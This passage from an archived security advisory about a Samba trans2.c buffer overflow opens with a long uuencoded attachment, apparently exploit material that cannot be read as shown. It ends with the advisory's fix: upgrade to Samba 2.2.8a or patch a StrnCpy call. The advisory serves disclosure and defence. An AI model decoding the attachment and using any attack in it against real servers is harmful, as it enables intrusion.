MW?$KAL,A:&"_'6P_SMG/;L[2["PY:>5EA7H4/FX"1_[<H?D:1.P8O[CPIHZ[
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
$`$`!````
`
end
SOLUTION
Upgrading to the latest version of Samba or Samba-TNG is the
recommended solution to this vulnerability. Samba version 2.2.8a, and
Samba-TNG version 0.3.2 are not vulnerable. There will be no new
releases for the 2.0 line of Samba code. The only fix for Samba 2.0 is
to apply the patches that Samba is providing.
A workaround in the current source code for this specific vulnerability
would be to modify the StrnCpy line found at line 250 in smbd/trans2.c
in the Samba 2.2.8 source code:
-StrnCpy(fname,pname,namelen);
+StrnCpy(fname,pname,MIN(namelen, sizeof(fname)-1));
As a result of this vulnerability being identified at least three
others have also been found by the Samba team after reviewing similar
usages in the source tree. One is a static overflow and the other two
are heap overflows. Applying the fix above will only protect against
the specific problem identified in this advisory. To fully protect
yourself, you must apply the patches from Samba, or upgrade to 2.2.8a.
Samba is available for download from: http://www.samba.org/ Samba-TNG
is available for download from: http://www.samba-tng.org/
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
